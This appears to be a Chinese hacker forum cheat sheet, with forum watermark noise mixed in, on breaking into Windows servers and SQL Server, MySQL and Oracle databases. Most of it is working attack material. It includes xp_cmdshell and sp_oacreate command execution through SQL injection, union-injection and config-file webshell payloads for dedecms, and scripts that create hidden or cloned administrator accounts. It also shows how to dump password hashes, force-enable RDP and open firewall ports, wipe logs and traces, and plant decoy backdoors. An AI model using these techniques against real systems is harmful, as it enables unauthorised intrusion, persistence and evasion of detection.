% E7 [/ L9 D5 C1.net user administrator /passwordreq:no6 x, Q* ~ n; {9 R& ]: a
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了) f Y7 S$ C- V0 G L
2.比较巧妙的建克隆号的步骤
" ?* R8 X5 U1 u5 W5 Y先建一个user的用户" S; U- ?. W' u+ @7 z
然后导出注册表。然后在计算机管理里删掉4 _+ J/ o1 p4 r" \8 F; u
在导入,在添加为管理员组
z2 W" R& n' f! N6 a& @3.查radmin密码
. ^! p, s1 m( M& c$ G7 h2 N" _reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg% H0 a2 `) p, m9 `+ V
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
- c8 z/ g4 ~5 j7 N# W& o建立一个"services.exe"的项9 d& |4 [' n& ^$ b" Z
再在其下面建立(字符串值)
! u# i" p8 ?) I8 q3 V) X7 \" ?4 }% W. B, S键值为mu ma的全路径0 ^ A3 Z3 t1 \) ]
5.runas /user:guest cmd' W! E4 U' c6 T
测试用户权限!
) Z! W# e7 O. A `6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
4 m# ]; h4 h% P7.入侵后漏洞修补、痕迹清理,后门置放:. x; i T" l! F4 C" I
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门/ X! c# F! S2 O2 A& h2 b; T
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c* J% h& }8 N& F! Z5 Q8 d% ]. y/ W
7 w1 a- `4 C& i
for example
3 P) O1 K k; Y4 [. e2 M8 l% U& [$ V* N0 d/ _, g V9 O
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'1 |, J' N, Y4 H: y/ b. q5 V' X" h
# q; A! r3 W/ G& O+ P$ u" w
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'0 [4 B/ X9 n( t' c
1 G! h+ ]! v% Y0 j9 `4 i) ]& W8 @4 Q9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
2 e. V4 H* I" N( s如果要启用的话就必须把他加到高级用户模式
$ @" @8 a. _/ M' q可以直接在注入点那里直接注入
8 m( n I9 E2 R9 }% B9 Q+ @id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--8 _4 D- ?, Z" _
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
7 b) F1 i8 P! g, l0 i% r* j或者5 W1 G( ~+ o% S
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
2 I5 o2 Y1 O1 X来恢复cmdshell。
4 d) U' s5 y4 S9 K0 A& m/ l) Q; S
9 h5 g6 f1 [% e: S7 u分析器3 n* a- O( x9 L- L# J
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
6 L8 m2 G+ R3 D; J( [然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")5 {) @- k5 I+ |3 `( Z$ J0 S
10.xp_cmdshell新的恢复办法 L' X, \% ~# k
xp_cmdshell新的恢复办法
9 B! O! u! X g* s b7 D- x3 V扩展储存过程被删除以后可以有很简单的办法恢复:
2 h5 N6 w! C' L6 `2 s删除
. s6 }: P( ?' O( r% v# fdrop procedure sp_addextendedproc6 M. J0 B$ C# \% o y. v+ w3 k
drop procedure sp_oacreate* ]& J# P; a( @7 H0 s3 z
exec sp_dropextendedproc 'xp_cmdshell'0 d4 X; ?! F- F6 a
8 n/ D; H4 T5 t7 @& }* S
恢复
0 ~: w! `% K4 M3 ^0 ~+ o( pdbcc addextendedproc ("sp_oacreate","odsole70.dll")* ]# F' Z7 ?, Y! }
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
8 S1 i+ s8 R/ _) P* h' [
0 v) X8 Q0 @) h7 ?2 U* l7 d这样可以直接恢复,不用去管sp_addextendedproc是不是存在
9 S2 G) h4 B% h! O) ^; F
! n7 {# O" h( k; [9 T5 n* {% j! l9 B7 g-----------------------------4 o; {5 d# ^* m8 e! y2 {
# I* \6 z0 n" v8 v
删除扩展存储过过程xp_cmdshell的语句:
3 {2 P- b; r2 B4 \% f* \/ Pexec sp_dropextendedproc 'xp_cmdshell'
! {4 o K1 S1 N. T' c: X9 { S' a# X6 i s1 X
恢复cmdshell的sql语句
6 p6 I& y* ^$ T5 rexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
, k! P; Z8 U( t9 ]) H2 s6 ~+ x- U$ P/ E- B: V& e
! u# I, G" G$ F% c开启cmdshell的sql语句6 k5 {& v6 o8 v {0 g M
- l) u" K% m0 C1 ^" v( ~
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
. B' C* ? N6 o, O; s3 ?) E# ^% c- c
- v* R: \3 j: g判断存储扩展是否存在
# l% H9 x( P6 _! tselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'1 _: [. ^6 A8 S+ ^& s4 V% f0 _) V
返回结果为1就ok) L# h+ A1 B$ Y! }/ O
9 A$ l: U( g0 v
恢复xp_cmdshell
- f+ \2 P% I q. aexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
+ c. w# L3 \4 f. f4 j2 e返回结果为1就ok
9 F) w- F% i/ A2 z3 q* q) {
. ] ?* w. C" f% D- r: H y: n否则上传xplog7.0.dll9 z7 b/ P2 r4 ]* o; {2 T, W ^7 ^5 y
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'2 h* D- c1 k1 ?! D
! i( [6 z& z$ Z6 ]; l6 r- T堵上cmdshell的sql语句
9 ? L7 c2 j4 isp_dropextendedproc "xp_cmdshel
7 O+ s, _4 g* ^" u* w* V-------------------------
0 G) M! t; G0 h( x清除3389的登录记录用一条系统自带的命令:
7 z# I7 q' T/ y$ jreg delete "hkcu\Software\Microsoft\Terminal Server Client" /f+ O5 S: i0 P' m+ ?; n1 D
4 |' t. l- [6 C" ^然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件* a% C! }2 H3 l8 K
在 mysql里查看当前用户的权限
2 K: T5 f% ]5 p8 ^/ T6 R Mshow grants for
" [2 H& L$ L( U( C
+ }3 S, E8 ^0 V8 \以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。, u0 i/ c- Y' @* F
' i' W" H4 d% |! T' ]7 ~0 k4 x$ ?; a7 m& T7 u. T/ _
Create USER 'itpro'@'%' IDENTIFIED BY '123';& n3 I7 a$ H. w7 |9 b" _% }% I$ t4 L
5 n! M0 k3 n9 k' ~GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
# Z4 ^: W2 V2 Y3 f, Z/ U, C% V8 e7 [& ^7 N( d' u4 ^
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0/ ]/ m7 v+ @8 H* z7 f6 f) D! z
0 u8 R* X( d3 c7 |9 ~9 T! Z$ C rMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
/ G6 R' B' N" F& b- t( p5 ]* l' ]9 K# t9 `( [4 w" Y
搞完事记得删除脚印哟。; j. q/ i: u/ K5 Y8 I
2 _4 a9 L2 L5 t7 U: H4 ^
Drop USER 'itpro'@'%';
+ B, G+ A: o4 [/ Z2 a
D9 Z+ Q8 v2 L+ V$ H5 M/ VDrop DATABASE IF EXISTS `itpro` ;
' c4 `! w+ \$ m) B b v2 s2 r' G# p" O7 V
当前用户获取system权限
' L/ a3 E8 O+ A; j+ L _2 t" usc Create SuperCMD binPath= "cmd /K start" type= own type= interact% v0 l! u' l1 s3 P3 p( q
sc start SuperCMD
) Z- a7 B6 f5 J* x" o3 y程序代码
/ Q! q& w1 y" J3 Y. o<SCRIPT LANGUAGE="VBScript">
: G) @! ~" O9 e- V0 q1 nset wsnetwork=CreateObject("WSCRIPT.NETWORK")
7 y, [9 T0 x* ~, E1 K kos="WinNT://"&wsnetwork.ComputerName
N9 e; L4 |9 RSet ob=GetObject(os)- l; y1 ?2 m7 b0 l# ?
Set oe=GetObject(os&"/Administrators,group")
/ _. l* U6 H+ r8 g( L( _! QSet od=ob.Create("user","nosec"): }9 T5 Z5 Z+ ?7 m1 \& {0 s
od.SetPassword "123456abc!@#"
! [- c) y2 b* ^9 Z0 rod.SetInfo
/ E6 L* L+ A1 X1 p) Y4 T* mSet of=GetObject(os&"/nosec",user)
5 E6 X; r, q( W+ `# qoe.add os&"/nosec"
! C- C3 x' W9 C8 T8 V( r6 I' E</Script>+ l |8 h( @. j4 t
<script language=javascript>window.close();</script>
9 W# Q1 v U _- e- E) x1 J
8 I1 E$ r5 N% b _( Z$ M1 Y1 P
( G5 R, X" W2 F# b; e' `' N
* `+ J: r q( B/ d/ `4 a) N' H( ^) x3 D( Y: J
突破验证码限制入后台拿shell
5 v( `/ g' J& M程序代码
4 x# ?' S9 N6 T0 F9 z$ a9 }REGEDIT4
1 S* u3 o9 k8 j. o4 \[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] 0 \$ i1 |; d% M
"BlockXBM"=dword:000000009 A5 g n! m; S- B; Z
* V; d- N- U1 a# g; A9 w- G
保存为code.reg,导入注册表,重器IE
/ A# l3 N7 ]; L就可以了. m( N5 |* Q9 [0 v# ~1 q V
union写马
: p3 B) B. C' |* c程序代码" }* f, Q. _( R/ O% h- `" k9 e
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
4 X" @/ W7 W+ D; e/ K/ e8 |3 }
, [: F3 P E- ` T* ]! y, t应用在dedecms注射漏洞上,无后台写马. y( ]! N# w5 F; K# D0 K
dedecms后台,无文件管理器,没有outfile权限的时候
: L+ a2 ^2 T( d在插件管理-病毒扫描里
# T* N1 V/ l% V% p写一句话进include/config_hand.php里) q! E+ |5 X% B4 }) S$ w
程序代码8 n4 m# w9 ]5 k4 E) ~
>';?><?php @eval($_POST[cmd]);?>
3 ?8 @& X: G) A8 t: t
( R) S* i0 M. V- y! R
" P9 ^8 h; Q( Y9 J l' D5 g- o& A如上格式! F \6 w$ {) x7 T: T& N7 |
0 D4 O% ]3 x' u* z* o
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解! a7 w5 v* G8 I( V: j2 e0 u
程序代码- J& o* q) U! C. _' p
select username,password from dba_users;
; |! u. H! c, t$ D# S9 P/ w' o' ^: {
/ |& k+ D$ ]. R+ v* e+ H
mysql远程连接用户+ o0 O% y; t' R2 n
程序代码
4 u( N+ z, M9 u" b
8 {) r8 O' `# b4 {* cCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';# V+ N9 M2 J3 h& S) V, ^
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION) B+ |$ T: W3 M4 o1 a: a
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0" y$ v0 t4 j& D* {) Y9 O
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;( y) [" U3 N$ W Q
" s! L# |+ ^" M( d* A
$ x; f1 U5 e% q) ^! C# Y R+ ]
% P' h% h* e% T. k% _ V
! f9 P/ X, Y o" v; Qecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
0 N1 J! v7 h1 P) u7 W$ z4 i( q5 ~
1.查询终端端口2 W7 g3 x! x, o* x
* f0 d6 E X/ |* k* u3 Wxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
, ]% K3 @. s* t5 |7 ]+ L0 l r2 j8 }$ S4 n
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"/ i# g; r; B2 c
type tsp.reg
! `! k! q: x2 H9 ?
T- M. x9 K! J5 F J- I- N2.开启XP&2003终端服务& t8 i' h( \. v& q1 }
# p, M9 g. [( Q" T9 l7 a8 r# }# x% o# D" L5 W( ]7 g
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
+ r2 j) u5 |8 G i; z: O
* K" g0 q9 l. \ s0 r- x0 {' H4 e1 J1 n9 ?0 o: ~- ~& b8 V) {
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
2 W& z0 K$ @- c: m Y2 [. F) y
4 X9 }! R9 P2 t3.更改终端端口为20008(0x4E28)6 B, b, O5 G. @- Q& g, e/ y
' P2 w0 G2 j0 \
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
, l$ ?5 `5 o" H* A' [7 h$ O& W2 E. Z5 j2 t- E: d. T' J
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f! e$ r/ w7 U$ x2 {
0 I' l: [5 b/ B! B0 Q/ a
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
/ |( B ~8 ?, @% P c
7 W1 [' Y, x- T& ~REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f. i, M: X- `! g8 R
, X3 O* B- j9 _/ o/ _
' Q" h: v& S+ ?! A
5.开启Win2000的终端,端口为3389(需重启)
1 W! o1 a, ?/ ?6 m
% u' v/ V. C8 j; Techo Windows Registry Editor Version 5.00 >2000.reg
# B) e7 ]3 s) j5 s% Zecho. >>2000.reg" t8 t) \5 E4 \' ?9 j
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg 9 v& a# @( ?' t; r+ q* n7 u
echo "Enabled"="0" >>2000.reg 1 P* S) k# t2 I. @2 _2 g% J* s1 P
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg # S9 p6 F f& Y" d @" d1 {% w
echo "ShutdownWithoutLogon"="0" >>2000.reg
! R; ?, ?3 ~' ]- z; K9 G( a* _echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
8 ] k& S5 I1 l# x' M8 Eecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg 7 m0 ^' l$ B0 T0 x
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
( w' x4 g: m) M) U% Q. yecho "TSEnabled"=dword:00000001 >>2000.reg , O9 Z* U# f( z% v+ V1 A, Z# p- p
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg & Y/ S: z9 I/ T+ S- `2 b
echo "Start"=dword:00000002 >>2000.reg 3 J }. N- i }
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
. _: ]$ B2 K( |' Z+ @1 ~echo "Start"=dword:00000002 >>2000.reg
! v3 e1 ]$ s: l! K. c4 Recho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg 8 u# G+ W* X4 n( O& ]% o
echo "Hotkey"="1" >>2000.reg 5 n, `) ~( k- Q& Q. ^+ B
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg - @& I5 I6 h" L a, I0 `
echo "ortNumber"=dword:00000D3D >>2000.reg + C+ e+ H- D; n
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg K" u6 D7 l' r" Y4 a4 \- B& }
echo "ortNumber"=dword:00000D3D >>2000.reg! |& H0 [- T9 o* p- t
& p% j/ P6 {$ C$ P6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)' B: `2 t4 \8 U! s' h9 T/ v& D
% i1 g" H( ~! h4 w5 k3 [8 U@ECHO OFF & cd/d %temp% & echo [version] > restart.inf- V& }7 J# N2 k+ ]4 T, N
(set inf=InstallHinfSection DefaultInstall)5 r6 M8 d, b X' C$ {
echo signature=$chicago$ >> restart.inf: g" p' H, I6 `
echo [defaultinstall] >> restart.inf7 l- w6 n/ l8 B1 u) n x
rundll32 setupapi,%inf% 1 %temp%\restart.inf4 ]& w8 m+ m& |
2 C+ C% E" s& w: M' u
) h U1 {5 k% i8 |: r1 R; N$ B
7.禁用TCP/IP端口筛选 (需重启)" t5 s2 S) d m; l
2 [* N. n$ y3 T: a1 WREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f1 F3 c- Y5 ~: m! F" `3 q
" ~) t9 |6 A4 F" L9 N7 k
8.终端超出最大连接数时可用下面的命令来连接
/ t( H4 L7 d, E0 \: q; o; w/ T* C& g, {0 b3 n
mstsc /v:ip:3389 /console
# ], q4 B, l9 j8 y# G& q
u- l% ^7 U n- {6 T8 k9.调整NTFS分区权限
; a1 d8 C7 a) B$ H( p7 r7 Y" Q. v, O
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
( l o, G) W& x' N: b2 u, b- C1 b: u$ L. U( y
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
+ h g$ u4 G, q {1 L) R/ e6 ]; T. ?
------------------------------------------------------
# j5 C6 l5 W0 J& c/ \3389.vbs
( M7 X _1 \+ H2 n9 ? `) jOn Error Resume Next
8 j* g1 ?4 y( }" Pconst HKEY_LOCAL_MACHINE = &H80000002
5 U" H; [1 Q8 ]9 O# I' FstrComputer = "."' X/ [8 g) @- z# G1 J7 x
Set StdOut = WScript.StdOut- f3 M4 J! J6 t$ N# n. L; G5 W8 v6 F8 T
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
5 ^2 D+ y; n- ]& sstrComputer & "\root\default:StdRegProv")
5 ]* C( B$ j& ZstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
9 Y! d z4 y+ M# Koreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
' p0 J) L0 L# }+ jstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
$ V6 _# t. ?4 O3 Y) |oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
( ?! l6 T' d" Z1 ?, \strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"! K, \ m! g p( n# i* A% \2 c
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
6 F! ~- O; R9 z. XstrValueName = "fDenyTSConnections"
% M" `3 o- z1 u X# ?2 B& K$ Q9 odwValue = 0
, o4 E: G& p7 @/ Woreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue5 }3 p" j. i; M1 r% Y
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
1 N5 E+ M- M. L8 o) @9 C8 ?strValueName = "ortNumber"
: j1 @ V% y+ T; g; V; B# ddwValue = 3389- ^' Y- u+ ? W2 g
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue+ ?* N- R3 _3 L" N, D* M
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
! R) z% }9 y4 c1 a' }1 E8 pstrValueName = "ortNumber", R: H" ^2 X( D8 D1 a9 n
dwValue = 3389, H5 t4 M4 r+ d2 e) g' j
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
' C5 V" C- T0 o+ g1 d/ N. XSet R = CreateObject("WScript.Shell")
0 Q3 ~& p' F# |4 ^4 bR.run("Shutdown.exe -f -r -t 0")
& v, p1 B V0 _5 |* e$ b: q. o1 r7 w
删除awgina.dll的注册表键值" x: L2 C$ _* I# V
程序代码8 K9 W+ O+ v4 X) _1 T! A) \
0 ]1 ]% Q9 g) \! U1 O2 |- f" Rreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f0 h, K; J5 a9 G& \( {
: Z: b( v% f6 d# d/ M
( f6 Y9 Z, ]6 }, u9 Q) d3 \8 @
# O/ \; X' R0 E+ W6 P3 c: \4 e
, f# n; ]% L% f; x% e程序代码
2 G6 ~) `: D% F% A0 iHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash% a" `: o% A* h5 K& i p# o# H
" B. N' {2 j) |5 o* m0 ?+ @* J7 W
设置为1,关闭LM Hash) B) x6 h% ^8 c8 e. n
2 p% [% t) ? L, X7 Z$ U数据库安全:入侵Oracle数据库常用操作命令
3 B* W& ^& `% m L4 ?- C最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
* C, g4 `2 l% L% [1 d1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
& d- d- y, p: Y2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
" e1 g$ S" n( V* S3、SQL>connect / as sysdba ;(as sysoper)或/ }. N5 |7 O; f- N
connect internal/oracle AS SYSDBA ;(scott/tiger)
1 K& u x; N$ ^conn sys/change_on_install as sysdba;
, m) o) ?) A) s: w- P: l$ N6 J4、SQL>startup; 启动数据库实例
4 f) A( k7 T0 j3 m0 K7 g. G1 y5、查看当前的所有数据库: select * from v$database;
! P5 W8 @ q) s, X8 y. oselect name from v$database;
# T% m- r$ N. P- S3 M. Z" N6、desc v$databases; 查看数据库结构字段+ e" e+ n( c c: B' z9 E9 |7 r
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:! h' P' ] T# T- i
SQL>select * from V_$PWFILE_USERS;
5 D9 H' Z' a" W+ K7 nShow user;查看当前数据库连接用户
# x% ~5 e2 k7 F" ]+ x4 a: s# }/ n8、进入test数据库:database test;1 j3 i$ M1 e e) B8 y3 z7 g' P' `, b
9、查看所有的数据库实例:select * from v$instance;
: A' _( Y7 D! `8 P! L0 O如:ora9i* Y: t9 W, |; I
10、查看当前库的所有数据表:% Q0 `' q! \6 f+ {
SQL> select TABLE_NAME from all_tables;
. J% f5 D) d) Q2 t& @select * from all_tables;
+ _) E; C# M4 A: Y9 @2 g6 U/ i) wSQL> select table_name from all_tables where table_name like '%u%';9 Q) m; y9 P: b7 g2 `# {: M
TABLE_NAME
/ X: b" o" F, B7 i. I/ `------------------------------
+ n; W( ?" ?9 b9 L `_default_auditing_options_( k& D% ?. [- J3 m
11、查看表结构:desc all_tables;
! S7 B) B8 |1 {9 }8 I4 q12、显示CQI.T_BBS_XUSER的所有字段结构:% z1 ~8 A- s( _
desc CQI.T_BBS_XUSER; E# i% c1 J! e, J& h3 B
13、获得CQI.T_BBS_XUSER表中的记录:8 A1 ^5 [6 `; C
select * from CQI.T_BBS_XUSER;! s) _9 p3 a) I: d& Y
14、增加数据库用户:(test11/test)
) M4 R O! Z/ [& a% l* dcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;$ ]% I% Y- _- E' [1 X2 b7 X7 R
15、用户授权:' P, g' S0 m2 b
grant connect,resource,dba to test11;
! L6 `6 a: u! a: P& sgrant sysdba to test11;% F4 S0 K O; {! A- p( K- d
commit;8 k7 P5 A8 s, s% G2 l0 j5 B
16、更改数据库用户的密码:(将sys与system的密码改为test.)% p3 Z( Z2 J6 W: C9 l
alter user sys indentified by test;
6 @5 c) I/ @1 Z) a# Ialter user system indentified by test;9 V U- _) e4 m% m
; y/ w! H9 v/ c9 a8 H. o
applicationContext-util.xml
6 I, }6 R/ ^$ F+ \applicationContext.xml2 [- y6 l7 q( R
struts-config.xml
2 p9 ?$ ?% l" @( S# Z5 ~web.xml6 N5 d# O( @7 B& y
server.xml
{( l. s7 [# Z3 j+ y$ r* s$ l" Ktomcat-users.xml
0 P [" A( O: q. ohibernate.cfg.xml
+ [8 c" C: C, \* _, zdatabase_pool_config.xml( Q% m9 ]- |! j3 W, X
7 K- u$ W8 K; Z8 P' ^, ^
' C) g2 \+ L c. l3 ~; F\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
. M6 q8 v% U1 Q% E\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini9 I2 x+ }+ \5 Z7 a8 W
\WEB-INF\struts-config.xml 文件目录结构
' ~3 |' ?. O, x$ A& a; s b! x( E
- X- R6 C& X7 F( Z0 k$ q& Ospring.properties 里边包含hibernate.cfg.xml的名称7 W. F5 D. o9 R0 Y2 b# n" w
- @/ N* c, o/ E- I2 O& q
# P' B2 O( M' u4 n: oC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml! Y+ i4 U" w: f- ^6 w
% ~% |& H c$ H* e! `. u
如果都找不到 那就看看class文件吧。。
0 e$ I" J2 H5 f7 T
. x0 H4 ^ q$ W* W9 F测试1:' G9 m$ Q4 F v) {& ^ \/ h
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
! y2 \' U. w+ q6 ]2 [, v
4 F+ D" D' @- ?4 ]9 x( `: z测试2:2 p3 [2 p; g. R4 E4 e' I
' M4 X' H; i) r7 G5 k
create table dirs(paths varchar(100),paths1 varchar(100), id int)
( c: j& e+ M8 S# b5 x$ Z2 d \! ?0 g# h$ ]
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--8 {/ w5 C9 e& g- q" T
/ Z9 |, H& f r7 c2 Q1 y+ \( F
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
1 K. Z. q; i0 @3 y. v$ R
! R4 ?' G; f6 l查看虚拟机中的共享文件:
. q% h7 g( u1 W2 V" A在虚拟机中的cmd中执行
3 V/ Z3 q) t$ w1 x4 e% q\\.host\Shared Folders& w6 e0 w5 \- N) K* ?
. K2 Q, Y3 M N, K; a. L! x7 Icmdshell下找终端的技巧
0 |4 t4 j1 g0 g, X: R8 O找终端: 5 T1 ?3 Z k; d2 I$ S: i* |
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! 2 S' s/ ^. n1 \; A7 e- y7 |
而终端所对应的服务名为:TermService , S7 @: g& d2 a1 v/ y! \8 ^- W
第二步:用netstat -ano命令,列出所有端口对应的PID值! 6 ~5 M. X3 U' N1 y2 }7 ]
找到PID值所对应的端口: |; |) i% N$ H y! f ~+ c& r& ]6 u
6 W7 [- G- _9 Z m/ o$ x1 q查询sql server 2005中的密码hash
+ O$ P4 N9 H9 H" _* u! [SELECT password_hash FROM sys.sql_logins where name='sa' t# G0 B8 a- i4 U" m; V
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a8 R" t* G7 m/ w( u) W+ q! [1 z
access中导出shell F- g% N+ m* N) [ Q4 K7 y
- d y9 w) c+ r1 n" S& A, I: s
中文版本操作系统中针对mysql添加用户完整代码:+ |. x1 f% d! R% D0 T) P5 B3 Z
0 G3 f6 f: P0 b: @) b
use test;; j- h, c& A# t
create table a (cmd text);) m! ]4 N! E& H" `# g, w$ w8 }" q/ X
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
